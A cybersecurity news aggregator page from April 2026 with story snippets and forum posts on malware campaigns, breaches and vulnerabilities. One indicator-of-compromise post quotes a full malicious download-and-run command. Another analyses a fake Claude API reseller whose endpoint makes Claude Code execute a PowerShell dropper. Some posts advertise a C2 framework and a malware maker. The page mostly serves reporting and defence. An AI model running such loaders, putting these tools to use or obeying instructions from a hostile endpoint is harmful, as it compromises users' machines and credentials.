Plus: Spy firms tap into a global telecom weakness to track targets, 500,000 UK health records go up for sale on Alibaba, Apple patches a revealing notification bug, and more.
Cybersecurity News and Vulnerability Aggregator
Cybersecurity news aggregator
Updated: 2:20 pm
J/K Navigate / Search S Save V Open Link
— or
treemd <(curl -sL https://allsec.sh/md) (as Markdown) Top Cybersecurity Stories Today
Coming in cold with custom Snow malware A previously unknown threat group using tried-and-tested social engineering tactics - Microsoft Teams chat invitations and helpdesk staff impersonation - is also using custom malware in its data-stealing attacks, according to Google's Threat Intelligence Group.…
Cybersecurity researchers have discovered a new Lua-based malware created years before the notorious Stuxnet worm that aimed to sabotage Iran's nuclear program by destroying uranium enrichment centrifuges. According to a new report published by SentinelOne, the previously undocumented cyber sabotage framework dates back to 2005, primarily targeting high-precision calculation software to tamper
Home security giant ADT has confirmed a data breach after the ShinyHunters extortion group threatened to leak stolen data unless a ransom is paid. [...]
The Bitwarden CLI was briefly compromised after attackers uploaded a malicious @bitwarden/cli package to npm containing a credential-stealing payload capable of spreading to other projects. [...]
Latest
Saturday, April 25
I published a deeper follow-up on the [`nailproxy.space`](http://nailproxy.space) campaign. What started as fake GitHub repos abusing the UNICORN Binance WebSocket API ecosystem now ties through a stage-1 Python dropper, a custom Windows loader, and a final-stage payload chain consistent with StealC v2. From a defender perspective, the useful parts are: * 19 confirmed public repos across 17 accounts * clear separation between delivery C2 and exfiltration/tasking infrastructure * per-sandbox behavior differences mattered a lot here * stronger correlation markers than the shared IP alone * practical victim-response guidance * IOCs submitted to ThreatFox Write-up: [https://blog.technopathy.club/from-a-coffee-in-bed-google-search-to-a-stealc-linked-campaign-the-story-behind-nailproxy-space](https://blog.technopathy.club/from-a-coffee-in-bed-google-search-to-a-stealc-linked-campaign-the-story-behind-nailproxy-space)
Malware targeting koreans only job is to screenshot card games and send them back to a C2 O\_o
Plus: Spy firms tap into a global telecom weakness to track targets, 500,000 UK health records go up for sale on Alibaba, Apple patches a revealing notification bug, and more.
Coming in cold with custom Snow malware A previously unknown threat group using tried-and-tested social engineering tactics - Microsoft Teams chat invitations and helpdesk staff impersonation - is also using custom malware in its data-stealing attacks, according to Google's Threat Intelligence Group.…
Cybersecurity researchers have discovered a new Lua-based malware created years before the notorious Stuxnet worm that aimed to sabotage Iran's nuclear program by destroying uranium enrichment centrifuges. According to a new report published by SentinelOne, the previously undocumented cyber sabotage framework dates back to 2005, primarily targeting high-precision calculation software to tamper
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday added four vulnerabilities impacting SimpleHelp, Samsung MagicINFO 9 Server, and D-Link DIR-823X series routers to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation. The list of vulnerabilities is below - CVE-2024-57726 (CVSS score: 9.9) - A missing authorization vulnerability in
Friday, April 24
Home security giant ADT has confirmed a data breach after the ShinyHunters extortion group threatened to leak stolen data unless a ransom is paid. [...]
Google took 70 days to remove "Music Downloader - VKsaver" after it was publicly disclosed as malware
`Feb 13, 2026` : The https://thehackernews.com/2026/02/malicious-chrome-extensions-caught.html publishes research on a malware campaign using 5 Chrome extensions. One is "Music Downloader - VKsaver" (lgakkahjfibfgmacigibnhcgepajgfdb). The extensions steal emails, business data, browsing history, and can exfiltrate audio via speech recognition. `Feb 13, 2026` : I add the IDs to my personal malicious extension database. `Apr 24, 2026` (today): Google removes it from the Chrome Web Store. That is 70 days where the extension was publicly known malware and still available for install. This is honestly the reason I started building [https://malext.io](https://malext.io) official stores are too slow, and most users have no visibility into threat reports. Chrome extension https://chromewebstore.google.com/detail/malext-sentry-malicious-e/bpohikihiogjgmebpnbgnloipjaddibe
Hey guys, I would like to share a project that I have been working for the past few weeks. I came across this project: [https://lots-project.com](https://lots-project.com/), and I thought why not develop a fully feature C2 framework that abuses these sites. The framework is named Phoenix, and is currently supporting Disc0rd and Telegr4m (Reddit broke down due to the latest DM update) for communication. These are a fraction of the available commands : ✅ /browser\_dump ✅ /keylog ✅ /recaudio ✅ /screenshot ✅ /webcam\_snap ✅ /stream\_webcam ✅ /stream\_desktop ✅ /bypass\_uac ✅ /get\_system I released the whole project on GitHub if you would like to check it out: [https://github.com/xM0kht4r/Phoenix-Framework](https://github.com/xM0kht4r/Phoenix-Framework) But why? I enjoy malware, and writing a custom C2 is something I wanted to do for a long time. I would like to also clarify that I made this project for educational and research purposes only. I have no intent of selling or distributing malware hence why I’m sharing my work with other fellow hacking enthusiasts. The github repos serve as a reference for future malware research opportunities. I know that malware development is a gray area, but you can’t defend against something if you don’t understand how it works in depth. I would like to also mention that I’m still a beginner, and this project helped me improve my Rust skills. I’m looking forward to hearing your feedback!
Cybersecurity agencies in the U.S. and U.K. are warning about a custom malware called Firestarter persisting on Cisco Firepower and Secure Firewall devices running Adaptive Security Appliance (ASA) or Firepower Threat Defense (FTD) software. [...]
Unsure whether this belongs here but, heads up for anyone doing detection/IR work. A few hours ago we came across a suspicious staged payload, that pretends to be Microsoft Endpoint DLP. Sharing the IOCs in case it helps others. Initial command looked like this: conhost --headless cmd /c "md %TMP%\x&curl -skLo %TMP%\x\t https://86hg23aljj9[.]com/d?tk=<token>&pushd %TMP%\x&tar xf t&del t&rundll32 endpointdlp.dll,#1" What we’ve confirmed so far: The first download is a tar archive containing: endpointdlp.dll data.bin The DLL loads/decrypts data from `data.bin`. The decrypted payload references: powwowski[.]com /payloads/update.zip That ZIP contains: mpextms.exe endpointdlp.dll The second stage appears to use DLL side loading: a Microsoft signed`mpextms.exe` loads a fake `endpointdlp.dll`. The malicious DLL also contains file management style strings such as: ls download upload delete rename mkdir I haven't been able to confirm from the files alone whether data exfiltrated is happening. Domains to block/hunt for: 86hg23aljj9[.]com powwowski[.]com Files/paths to look for: %TEMP%\x\endpointdlp.dll %TEMP%\x\data.bin %LOCALAPPDATA%\PlatformServices\ %LOCALAPPDATA%\PlatformServices\upd.zip %LOCALAPPDATA%\PlatformServices\update.zip %LOCALAPPDATA%\PlatformServices\mpextms.exe %LOCALAPPDATA%\PlatformServices\endpointdlp.dll Process activity to look for: conhost.exe --headless curl.exe -skLo ...\Temp\x\t tar.exe xf t rundll32.exe endpointdlp.dll,#1 powershell.exe -WindowStyle Hidden -NonInteractive ... Expand-Archive mpextms.exe running from %LOCALAPPDATA%\PlatformServices\ Hashes we observed: First-stage endpointdlp.dll SHA256: 1e41c7bfaa6aa3b93b6cc024274a10e33f3e12fe7c98c1db387ef8927f9d1984 First-stage data.bin SHA256: 40bfa63bed033723edcbd476800ff8360d530fc21aa8ed83bebb7dfc22a584f4 Second-stage mpextms.exe SHA256: a3ff17daf9001831741d6b3479d679482218d8a7b7c7ceadaebd590fcafe1f8e Second-stage endpointdlp.dll SHA256: 9e52cc90cff150abe21f0a6440e86e0a99ff383b81061b96def8948e21d0ac66 Hope this helps someone else catch it early!
Microsoft is rolling out Windows Update improvements that give users more control over how updates are installed while reducing disruption from frequent or poorly timed restarts. [...]
I wrote a custom jellyfin addon to get back access to ssh
A new financially motivated hacking group tracked as BlackFile has been linked to a wave of data theft and extortion attacks against retail and hospitality organizations since February 2026. [...]
Microsoft will roll out passkey support for phishing-resistant passwordless authentication to Microsoft Entra‑protected resources from Windows devices starting late April. [...]
A new vulnerability dubbed Pack2TheRoot could be exploited in the PackageKit daemon to allow local Linux users to install or remove system packages and gain root permissions. [...]
US clarifies mobile hotspots part of foreign router ban despite rarity of American made consumer kit
Silicon often from US, but the kit from APAC and elsewhere America's telco regulator has clarified its ban on foreign-made routers also includes mobile hotspots and domestic routers that use a 5G cellular connection to the internet.…
Leak-site bragging meets breach hunters as Have I Been Pwned flags millions of records Carnival Corporation, the world's largest cruise company, is dealing with choppy waters after Have I Been Pwned flagged what it claimed were 7.5 million unique email addresses all allegedly tied to one of its subsidiaries. …
A US surveillance program that lets the FBI view Americans’ communications without a warrant is up for renewal. A new bill aims to address mounting lawmaker concerns—with smoke and mirrors.
Latest in long-running pwning of Cisco kit found in mystery Fed agency A US federal agency was successfully targeted by a previously unknown backdoor malware called Firestarter, according to CISA cybersnoops and their UK counterparts – neither of which disclosed the agency's name.…
One way to deal with bug hunting LLMs: ditch the old drivers One tactic to deal with LLM-powered vulnerability detection is simple – just speed up the removal of old code. If it's gone, it no longer matters if it's buggy.…
Article 9 of DORA makes authentication and access control a legal obligation for EU financial entities. Here is what the regulation requires, and what a breach looks like when those controls are missing. [...]
Over 10,000 Zimbra Collaboration Suite (ZCS) instances exposed online are vulnerable to ongoing attacks exploiting a cross-site scripting (XSS) security flaw. [...]
Chipzilla hopes agents, robots, and edge devices make CPUs cool again... now it has to build the chips Intel is betting on AI to reverse its fortunes, wagering that inference and agentic workloads will restore the CPU to the center of compute - even as its chip manufacturing struggles persist.…
The AI Agent Authority Gap - From Ungoverned to Delegation As discussed in our previous article, AI agents are exposing a structural gap in enterprise security, but the problem is often framed too narrowly. The issue is not simply that agents are new actors. It is that agents are delegated actors. They do not emerge with independent authority. They are triggered, invoked, provisioned, or
Cybersecurity researchers have discovered a set of malicious apps on the Apple App Store that impersonate popular cryptocurrency wallets in an attempt to steal recovery phrases and private keys since at least fall 2025. "Once launched, these apps redirect users to browser pages designed to look similar to the App Store and distribute trojanized versions of legitimate wallets," Kaspersky
Ailing scaling blamed by Windows-maker for unreadable missives Microsoft's update to harden Remote Desktop against phishing attacks has arrived. When users open a Remote Desktop (.rdp) file, they should now see a warning listing all requested connection settings - or they would if it was displaying correctly.…
OpenAI's first security hire, Ari Herbert-Voss, thinks more automated bug finding will improve security without costing jobs Black Hat Asia Open source models can find bugs as effectively as Anthropic's Mythos, according to Ari Herbert-Voss, CEO of AI-powered security startup RunSybil and OpenAI's first security hire.…
Microsoft says IT administrators can now uninstall the AI-powered Copilot digital assistant from enterprise devices using a new policy setting, which has become broadly available after the April 2026 Patch Tuesday. [...]
Full disclosure: I work on community at Always Further, the team behind this. Not the author. Posting because Luke's approach to tackling this challenge is unique and of an interest to the netsec community. The core idea: if an AI agent is compromised, any log the agent itself writes becomes part of the attack surface. The post walks through how they split auditing into a supervisor process the sandboxed child can't reach, then uses the same Merkle tree + hash-chain construction RFC 6962 (Certificate Transparency) uses to make edits, truncation, and reordering all detectable. There's a concrete threat-model table near the end that lists what each attack looks like and what structurally stops it. Worth skipping to if you don't want the crypto primer.
Chinese-speaking individuals are the target of a new campaign that uses a trojanized version of SumatraPDF reader to deploy the AdaptixC2 Beacon post-exploitation agent and ultimately facilitate the abuse of Microsoft Visual Studio Code (VS Code) tunnels for remote access. Zscaler ThreatLabz, which discovered the campaign last month, has attributed it with high confidence to Tropic Trooper (aka
Missed flights and more means something has got to give at the border Greece is taking a flexible approach to introducing the European Union's biometric Entry/Exit System (EES), after some British passport holders missed flights home following the system's implementation on 10 April.…
Nothing says 'We want honest opinions' like a 36,000-letter mailshot with no awkward questions allowed Members of the UK government’s People’s Panel on Digital ID will spend two weekends in Birmingham and three evenings on Zoom discussing how Britain should build a national digital identity system, earning £550 plus expenses for their trouble.…
Demonstrated in China, probably applicable elsewhere Black Hat Asia Developers of rented internet of things infrastructure – stuff like public EV chargers and shared e-bikes – are prioritizing user convenience over security, and leaving themselves exposed to wide-scale denial of service attacks on their services.…
Thursday, April 23
Researchers have finally cracked Fast16, mysterious code capable of silently tampering with calculation and simulation software. It was created in 2005—and likely deployed by the US or an ally.
\*\*TL;DR: [awstore.cloud](http://awstore.cloud) sells "cheap Claude API access" on Plati Market and other reseller platforms. It's actually a malware delivery system that uses Claude Code itself to execute a PowerShell dropper on your machine. I analyzed it, here's what you need to know.\*\* Posting this because I nearly got hit and want to warn others. This is a really clever attack that abuses how Claude Code works. \## The setup (why it looks legit): \- They sell API access on \*\*legitimate reseller marketplaces\*\* like Plati Market \- Prices are \*\*suspiciously cheap\*\* compared to official Anthropic pricing \- They present themselves as a normal API provider/reseller \- Documentation, payment processing, all looks professional \- Classic "too good to be true" - but the resale marketplace gives them credibility \## The weird red flag I ignored: After a brief downtime, the service came back with a notice saying \*\*"currently only Claude Code for Windows works"\*\* Think about that for a second. \*\*API is API.\*\* If their endpoint is a real Claude-compatible proxy, it should work with any client - curl, Python SDK, whatever. "Only Claude Code on Windows works" makes ZERO technical sense for a legitimate API reseller. That was the tell. I should've stopped there. Instead I tested it on a throwaway VM. \## What actually happens when you use it: 1. You configure Claude Code with their \`ANTHROPIC\_BASE\_URL=[https://api.awstore.cloud\`](https://api.awstore.cloud`) and their token 2. You send literally ANY prompt to Claude Code 3. Instead of a normal Claude response, the server returns what looks like a \*\*"configuration message"\*\*/ setup instruction 4. Claude Code, thinking this is a legitimate tool-use response, 5. \*\*executes a PowerShell command without asking\*\* 6. That PowerShell command downloads and runs the dropper from \`api.awstore.cloud\` 7. You're now infected \*\*The attack vector IS Claude Code itself.\*\* They're not tricking you into running something - they're tricking Claude Code into running something on your behalf. That's why it only "works on Windows with Claude Code" - because that's the only client that has the tool execution capability they're abusing. \## What the malware does once it's in: \*\*4-stage deployment\*\* : PowerShell → Go binary → VBS obfuscation → .NET payload \- Hides in \`%LOCALAPPDATA%\\Microsoft\\SngCache\\\` and \`%LOCALAPPDATA%\\Microsoft\\IdentityCRL\\\` (legit-looking Microsoft folders) \- Creates a scheduled task \`\\Microsoft\\Windows\\Maintenance\\CodeAssist\` that runs at every logon with SYSTEM privileges \- Tunnels ALL your system traffic through their SOCKS5 proxy at \`2.27.43.246:1080\` (Germany, bulletproof hosting) \- Disables PowerShell script block logging and wipes event logs \- Drops what [Tria.ge](http://Tria.ge) identified as \*\*Aura Stealer\*\* (credential/browser/wallet theft) \- Keeps your Claude Code hijacked so every future prompt goes through them \## Geopolitical fingerprint (interesting): \- Hard-coded check: \*\*if country = Ukraine → immediately exit, no infection\*\* \- CIS countries (Russia, Belarus, Kazakhstan, etc.) → locale gets masked to en-US before infection, then restored after reboot to hide tracks \- Rest of the world → full infection Pretty clear Russian-speaking threat actor profile based on targeting. \## Red flags for ANY "cheap Claude API" service: \- Sold on reseller marketplaces (Plati, similar) \- Prices way below official Anthropic pricing \- Claims of "unlimited" or "cracked" access \- Client-specific restrictions that make no technical sense ("only works with Claude Code", "only on Windows") \- Sketchy support channels (Telegram, Discord DMs) \- Requires you to change \`ANTHROPIC\_BASE\_URL\` to their domain \## If you used awstore.cloud: \*\*Assume full compromise. Treat that machine as burned.\*\* 1. Disconnect from network immediately 2. Check \`\~/.claude/settings.json\` → remove any \`ANTHROPIC\_BASE\_URL\` override 3. Check Task Scheduler for \`\\Microsoft\\Windows\\Maintenance\\CodeAssist\` 4. Check for processes: \`claude-code.exe\`, \`awproxy.exe\`, \`proxy.exe\`, \`tun2socks.exe\` 5. Change 6. \*\*every password\*\* 7. \- browser saved creds, SSH keys, API tokens, crypto wallets, everything 8. Rotate any API keys, tokens, or credentials that were in your shell history or project files 9. Ideally: 10. \*\*nuke the machine and reinstall Windows\*\* \## Network IOCs to block: [api.awstore.cloud](http://api.awstore.cloud)(C2 domain) [2.27.43.246](http://2.27.43.246)(SOCKS5 proxy, AS215439) \## File hashes (SHA256): claude-code.exe: e692b647018bf74ad7403d5b8cf981c8cfaa777dd7f16a747e3d3f80f5300971 awproxy.exe: 8736f7040f587472f66e85e895709e57605c8e7805522334ae664e3145a81127 proxy.exe: e86f7ba0413a3a4b1d7e1a275b3d1ef62345c9d3fd761635ff188119b8122c85 tun2socks.exe: 90547fe071fe471b02da83dd150b5db7ce02454797e7f288d489b1ff0c4dd67c \## The bigger picture: This is the \*\*first in-the-wild attack I've seen that weaponizes an LLM agent's tool-use capability against its own user via a malicious API endpoint\*\* . It's going to get copied. Expect more fake API providers targeting Cursor, Cline, Continue, etc. \*\*Rule of thumb: only use official API providers.\*\* The real Claude API is \`api.anthropic.com\`. If a "reseller" needs you to change the base URL to a domain you've never heard of, they control what your AI agent executes on your machine. Full stop. Share this with your dev communities. Campaign is very fresh (started April 22-23, 2026) and actively spreading via reseller marketplaces. Stay safe.
Legit-looking website, camera-on interviews, jokes about backdoors ... it worked EXCLUSIVE It all started with a LinkedIn message, as so many employment scams do these days.…
Posted by Thomas Brunner, Yu-Han Liu, Moni Pande At Google, our Threat Intelligence teams are dedicated to staying ahead of real-world adversarial activity, proactively monitoring emerging threats before they can impact users. Right now, Indirect Prompt Injection (IPI) is a top priority for the security community, anticipating it as a primary attack vector for adversaries to target and compromise AI agents. But while the danger of IPI is widely discussed, are threat actors actually exploiting this vector today – and if so, how? To answer these questions and to uncover real-world abuse, we initiated a broad sweep of the public web to monitor for known indirect prompt injection patterns. This is what we found. The threat of indirect prompt injection
Hackers are actively exploiting a critical vulnerability in the Breeze Cache plugin for WordPress that allows uploading arbitrary files on the server without authentication. [...]
All the Typhoons, everywhere, all at once A majority of China-linked threat actors are using compromised routers and IoT devices worldwide, turning this gear into proxy networks to carry out further intrusions, steal sensitive data, and disrupt victim organizations’ operations, according to a joint 10-country advisory.…
The Bitwarden CLI was briefly compromised after attackers uploaded a malicious @bitwarden/cli package to npm containing a credential-stealing payload capable of spreading to other projects. [...]
Technology minister tells Commons ‘de-identified’ information from UK Biobank advertised for sale on Alibaba The confidential health records of half a million British volunteers have been offered for sale on Chinese website Alibaba, the UK government has confirmed. The “de-identified” data, belonging to participants in the UK Biobank project, was found for sale on three separate listings last week. Ian Murray, the technology minister, told the Commons on Thursday that, after working with the Chinese government and Alibaba, the records had now been removed. It is not believed any sales were made. Continue reading...
Push to protect minors risks hitting everyone online Proton's boss has waded into the age verification fight with a warning that sounds less like child safety and more like an identity checkpoint for the entire internet.…
Hackers have compromised Docker images, VSCode and Open VSX extensions for the Checkmarx KICS analysis tool to harvest sensitive data from developer environments. [...]
So i wrote this little program on C# wich is a gdi malware maker for skids. U can download it on [downloadbudgiekit.42web](http://downloadbudgiekit.42web.io).io(no linkvertise shit like original maltoolkit page) https://preview.redd.it/s3ngozva7ywg1.png?width=479&format=png&auto=webp&s=d5a761e944e8658d8e2ef112890cbd793aeb55ed https://preview.redd.it/kuxshygd7ywg1.png?width=475&format=png&auto=webp&s=79c00f868dee8b99f9f9e08179b0d20cf3348e79 https://preview.redd.it/vbmbi69f7ywg1.png?width=482&format=png&auto=webp&s=82deb58994a2f1324f3646d41ba380997a464078 https://preview.redd.it/xf3hzh8j7ywg1.png?width=469&format=png&auto=webp&s=a1963e3f0fcc13729e4a8babdf34eb351f63d4f8 https://preview.redd.it/jqe1cm9n7ywg1.png?width=471&format=png&auto=webp&s=e0e3359a142ec365e7f96c9a30c26841b406be63 [generated exe](https://preview.redd.it/aqukp14t7ywg1.png?width=154&format=png&auto=webp&s=acdb25d9c259e184dd28e9dea6935f5cfb76b774) https://preview.redd.it/qie4zq5w7ywg1.png?width=669&format=png&auto=webp&s=080449cdfaac0c7d163884cc9047b2bec6cb223f
Password resets are one of the easiest ways for attackers to bypass security controls. Specops Software shows how helpdesk social engineering turns a seemingly legitimate reset request into full account compromise. [...]
Bitwarden CLI, the command-line interface for the password manager Bitwarden, has reportedly been compromised as part of a newly discovered and ongoing Checkmarx supply chain campaign, according to findings from JFrog and Socket. "The affected package version appears to be @bitwarden/cli@2026.4.0, and the malicious code was published in 'bw1.js,' a file included in the package contents," the
Wins $300M deal over Salesforce, IBM because of 'integration with existing USDA systems,' among other things Palantir has won a $300 million contract from the US Department of Agriculture (USDA) to support the National Farm Security Action Plan (NFSAP) and modernize how USDA delivers services to America's farmers.…
You scroll past one incident and see another that feels familiar, like it should have been fixed years ago, but it still works with small changes. Same bugs. Same mistakes. The supply chain is messy. Packages you did not check are stealing data, adding backdoors, and spreading. Attacking the systems behind apps is easier than breaking the apps themselves. The exploits are simple but still work
World's largest biomedical dataset lifted and shifted on Chinese mega marketplace Updated Details of volunteers of UK-based Biobank, which describes itself as the custodian of the world's most comprehensive biomedical dataset, are for sale on Chinese ecommerce site Alibaba.…
VU#748485: Unauthenticated configuration modification vulnerability in Central Office Services - Content Hosting Component
Overview A security flaw exists in the configuration management endpoint of the DRC INSIGHT software, allowing an unauthenticated user with access to the same network as the server to modify the server’s configuration file. This could enable data exfiltration, traffic redirection, or service disruption. Description Data Recognition Corporation (DRC) provides software for test proctoring, including the web-based DRC INSIGHT platform. A component of this platform, Central Office Services (COS), is typically deployed on a school or district local area network to host and distribute testing content to student devices. COS uses a unified API router that serves both public content functions, such as exam delivery, and administrative functions, without meaningful separation between content-serving APIs and management APIs. The /v0/configuration administrative endpoint is accessible to systems on the same network as the COS server without authentication or origin validation. Any unauthenticated user or compromised device with network access to the server may submit requests that modify the server’s configuration file. The endpoint accepts and persists user-supplied JSON payloads without validating content, checking authorization, or verifying the safety of requested configuration changes. This vulnerability is tracked as CVE-2026-5756. Impact Exploitation could allow an attacker to exfiltrate student data by overwriting storage configuration values or credentials so that test artifacts, responses, or audio recordings are sent to attacker-controlled external services instead of intended DRC-managed destinations. An attacker could also intercept or manipulate outbound traffic by inserting a malicious httpsProxy setting, causing HTTPS
Windows Admin Center flaws mean on-prem can attack cloud, and vice-versa Black Hat Asia Israeli researchers found a series of flaws in Microsoft's Windows Admin Center (WAC) and suggest this shows hybrid cloud management tools are a two-way attack surface that users don't spend enough time worrying about.…
We’re open-sourcing Trailmark , a library that parses source code into a queryable call graph of functions, classes, call relationships, and semantic metadata, then exposes that graph through a Python API that Claude skills can call directly. Install it now: uv pip install trailmark “Defenders think in lists. Attackers think in graphs. As long as this is true, attackers win.” John Lambert’s widely cited observation about network security applies just as well to AI-assisted software analysis. When Claude reasons about a codebase, it reasons about lists: findings from static analyzers, surviving mutants from mutation testing, and line-by-line coverage reports. But the question that actually matters is a graph question: can untrusted input reach this code, and what breaks if it’s wrong? We built Trailmark to answer that question. It gives Claude a graph to think with instead of a list. We’re also releasing eight Claude Code skills we’ve built on top of it, designed for mutation triage, test vector generation, protocol diagramming, and more. When lists fall short Mutation testing is a great example of a method that benefits from graph-level reasoning. It’s one of the best ways to measure test quality. It makes small changes to your source code (e.g., swapping a < for <= , replacing + with - ) and checks whether your tests cat
Orgs can now buy UK cyber agency engineered commercial gadget, but details are slim GCHQ's cyber arm has entered the hardware game with its first device designed to prevent cyberattacks on display devices.…
Keeping it simple for the developers can lead to very complex headaches later PWNED Welcome back to PWNED, the column where we celebrate the people who’ve taught us how not to secure a server. If you’ve ever tied your own shoelaces together, then tripped over them, or attempted to dive into a swimming pool but hit your head on the diving board, we’ll be talking about your cyber equivalent.…
Vercel on Wednesday revealed that it has identified an additional set of customer accounts that were compromised as part of a security incident that enabled unauthorized access to its internal systems. The company said it made the discovery after expanding its investigation to include an extra set of compromise indicators, alongside a review of requests to the Vercel network and environment
Apple has rolled out a software fix for iOS and iPadOS to address a Notification Services flaw that stored notifications marked for deletion on the device. The vulnerability, tracked as CVE-2026-28950 (CVSS score: N/A), has been described as a logging issue that has been addressed with improved data redaction. "Notifications marked for deletion could be unexpectedly retained on the device,"
Wednesday, April 22
Some more information from the author of PackageKit on [https://www.openwall.com/lists/oss-security/2026/04/22/6](https://www.openwall.com/lists/oss-security/2026/04/22/6) too. Expect to see reliable (public) exploits pretty soon.
[Release] LCSAJdump v2.0: I added an ML ranking engine to my gadget finder (and thanks for 7k downloads!)
One group of hackers used AI for everything from vibe coding their malware to creating fake company websites—and stole as much as $12 million in three months.
The threat actor known as Harvester has been attributed to a new Linux version of its GoGra backdoor deployed as part of attacks likely targeting entities in South Asia. "The malware uses the legitimate Microsoft Graph API and Outlook mailboxes as a covert command-and-control (C2) channel, allowing it to bypass traditional perimeter network defenses," the Symantec and Carbon Black Threat Hunter
Key Takeaways We identified an exposed server that provided unusual visibility into a large-scale, multi-victim exploitation and collection operation. Artifacts on the host showed that Claude Code and OpenClaw were embedded in the operator’s day-to-day workflow, supporting troubleshooting, orchestration, and refinement of the collection pipeline. This AI-assisted workflow resulted in the modular platform Bissa scanner […] The post Bissa Scanner Exposed: AI-Assisted Mass Exploitation and Credential Harvesting appeared first on The DFIR Report .
Overview Ollama’s model quantization engine contains a vulnerability that allows an attacker with access to the model upload interface to read and potentially exfiltrate heap memory from the server. This issue may lead to unintended behavior, including unauthorized access to sensitive data and, in some cases, broader system compromise. Description Ollama is an open-source tool designed to run large language models (LLMs) locally on personal systems, including macOS, Windows, and Linux. Ollama supports model quantization, an optimization technique that reduces the numerical precision used in models to improve performance and efficiency. An out-of-bounds heap read/write vulnerability has been identified in Ollama’s model processing engine. By uploading a specially crafted GPT-Generated Unified Format (GGUF) file and triggering the quantization process, an attacker can cause the server to read beyond intended memory boundaries and write the leaked data into a new model layer. CVE-2026-5757: Unauthenticated remote information disclosure vulnerability in Ollama's model quantization engine allows an attacker to read and exfiltrate the server's heap memory, potentially leading to sensitive data exposure, further compromise, and stealthy persistence. The vulnerability is caused by three combined factors: No Bounds Checking: The quantization engine trusts tensor metadata (like element count) from the user-supplied GGUF file header without verifying it against the actual size of the provided data. Unsafe Memory Access: Go's unsafe.Slice is used to create a memory slice based on the attacker-controlled element count, which can extend far beyond the legitimate data buffer and into the application's heap. &
Rust Workers run on the Cloudflare Workers platform by compiling Rust to WebAssembly, but as we’ve found, WebAssembly has some sharp edges. When things go wrong with a panic or an unexpected abort, the runtime can be left in an undefined state. For users of Rust Workers, panics were historically fatal, poisoning the instance and possibly even bricking the Worker for a period of time. While we were able to detect and mitigate these issues, there remained a small chance that a Rust Worker would unexpectedly fail and cause other requests to fail along with it. An unhandled Rust abort in a Worker affecting one request might escalate into a broader failure affecting sibling requests or even continue to affect new incoming requests. The root cause of this was in wasm-bindgen, the core project that generates the Rust-to-JavaScript bindings Rust Workers depend on, and its lack of built-in recovery semantics. In this post, we’ll share how the latest version of Rust Workers handles comprehensive Wasm error recovery that solves this abort-induced sandbox poisoning. This work has been contributed back into wasm-bindgen as part of our collaboration within the wasm-bindgen organization formed last year . First with panic=unwind support, which ensures that a single failed request never poisons other requests, and then with abort recovery mechanisms that guarantee Rust code on Wasm can never re-execute after an abort. Initial recovery mitigations Our initial attempts to address reliability in this area focused on understanding and containing failures caused by Rust panics and aborts in producti
Cybersecurity researchers have discovered a previously undocumented data wiper that has been used in attacks targeting Venezuela at the end of last year and the start of 2026. Dubbed Lotus Wiper, the novel file wiper has been used in a destructive campaign targeting the energy and utilities sector in Venezuela, per findings from Kaspersky. "Two batch scripts are responsible for initiating the
Rental platform unnecessarily collected the data of millions of Australians, privacy commissioner finds
2Apply’s over-collection of personal information adds to the power of the real estate industry in the competitive rental market, Carly Kind says Follow our Australia news live blog for latest updates Get our breaking news email , free app or daily news podcast An online rental platform has been urged to stop collecting users’ personal information after the Australian privacy commissioner found the gathering of “excessive” data compounded the vulnerability of tenants amid the housing crisis. RentTech platforms are increasingly used by real estate agents in Australia for people applying for rental properties to submit applications and supporting documentation . The Australian Housing and Urban Research Institute has identified 57 different rent platforms operating in Australia. Continue reading...
How Security Teams Are Really Using Agentic AI Security leaders aren’t waiting to see how agentic AI plays out. They’re already betting on it, and they’ve developed strong opinions about what separates a real penetration testing solution from a rebranded scanner or other DAST tools. In fact, recent research from Fortune and Lightspeed Ventures shows […] The post The New Standard: Why 64% of Firms Prefer Human-Validated AI Pentesting appeared first on Synack .
Tuesday, April 21
Presently sponsored by: Report URI: Guarding you from rogue JavaScript! Don’t get pwned; get real-time alerts & prevent breaches #SecureYourSite Looking back at this milestone video, it's the audience question towards the end I liked most: "are you happy"? Charlotte and I have chosen a path that's non-traditional, intense and at times, pretty stressful. There's no clear delineation of when work starts and ends, no holidays where we don't work, nor weekends, birthdays or Christmases. But we do so on our terms. It gives us a life of means and choices, one with excitement and adventure, and, above all, one with purpose, where we feel like we're doing something that makes a meaningful difference. I hope you enjoy this week's video, it's more personal than usual, but yeah, that's kinda what you do at milestones
Adding to the DFIR + AI theme, in case you didn't see it on LinkedIn, we released an MCP server for Autopsy last week (and Cyber Triage). This allows you to connect Claude Desktop (or similar) to Autopsy and ask questions about the results. It's a read-only interface, so your original data won't get modified by the AI. We've also been doing an Intro DFIR+AI series if you are just starting to really pay attention to how to integrate these things: Autopsy Release: [https://www.autopsy.com/autopsy-4-23-0-release-claude-ai-assistant-mcp-cyber-triage-integration/](https://www.autopsy.com/autopsy-4-23-0-release-claude-ai-assistant-mcp-cyber-triage-integration/) AI Blogs: * [How to Let AI Access Your DFIR and SOC Investigation Data](https://www.cybertriage.com/ai/how-to-let-ai-access-your-dfir-and-soc-investigation-data/) * [MCP Servers for DFIR and SOC Investigations using AI](https://www.cybertriage.com/ai/intro-to-mcp-servers-for-dfir-and-soc-investigations-using-ai/) * [How To Share Your “SKILLS” With the LLM](https://www.cybertriage.com/blog/ai-dfir-how-to-share-your-skills-with-the-llm/)
CVE-2026-32604 and CVE-2026-32613 are both 10.0 severity vulnerabilities in Spinnaker, which allow attackers to execute arbitrary code and access production cloud environments and source control. They provide an easy path from a compromised workstation to more sensitive areas. Our blog post contains a comprehensive technical breakdown and working POCs.
When 500,000 Findings Hide 14 Real Threats Modern enterprises ingest vulnerability data from dozens of sources: endpoint detection and response platforms, vulnerability scanners, cloud security posture tools, container image scanners. A large organization can easily accumulate hundreds of thousands of individual findings. The standard response is to sort by CVSS score, filter for criticals, and start patching. But vulnerability management needs to shift from CVSS-based severity ranking to contextual exploit chain analysis — evaluating how individual vulnerabilities combine into realistic attack paths. The problem is that CVSS scores evaluate vulnerabilities in isolation. A renderer vulnerability in a web browser is serious, but the browser sandbox contains it. A sandbox escape is dangerous, but it requires an initial foothold to exploit. Neither finding alone tells you the full story. But if the same endpoint is vulnerable to both, an attacker can chain them together into a zero click, full host compromise with no user interaction beyond visiting a webpage. That combined risk is qualitatively different from anything either CVE represents on its own. Recently, we used Praetorian Guard to analyze a customer environment containing roughly 500,000 vulnerability findings ingested from the customer’s CrowdStrike deployment. Guard integrates with over
